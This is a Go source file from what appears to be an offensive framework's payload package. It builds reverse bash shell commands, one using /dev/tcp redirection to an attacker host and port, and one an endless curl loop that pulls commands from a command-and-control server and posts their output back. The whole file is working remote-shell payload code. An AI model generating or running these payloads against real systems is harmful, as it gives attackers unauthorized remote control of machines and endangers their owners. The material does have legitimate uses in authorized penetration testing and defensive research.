package reverse

import (
	"fmt"
)

const (
	BashDefault        = BashTCPRedirection
	BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
	BashHTTPShellLoop  = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H"VC-Auth: %s" %s://%s:%d || exit)")" %s-H"VC-Auth: %s" %s://%s:%d/rx ||exit;sleep 1;done'`
)

// The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
func (bash *BashPayload) Default(lhost string, lport int) string {
	return fmt.Sprintf(BashDefault, lhost, lport)
}

// Utilizes the bash networking pseudo `/dev/tcp/` functionality to create a reverse bash shell.
func (bash *BashPayload) TCPRedirection(lhost string, lport int) string {
	return fmt.Sprintf(BashDefault, lhost, lport)
}

// An infinite loop shell script that will stay running until the HTTP server fails to respond.
// This fits the c2.HTTPShellServer C2 logic in a shell script form.
func (bash *BashPayload) HTTPShellLoop(lhost string, lport int, ssl bool, auth string) string {
	k := ``
	h := `http`
	if ssl {
		h = "https"
		k = `-k `
	}
	return fmt.Sprintf(BashHTTPShellLoop, k, auth, h, lhost, lport, k, auth, h, lhost, lport)
}
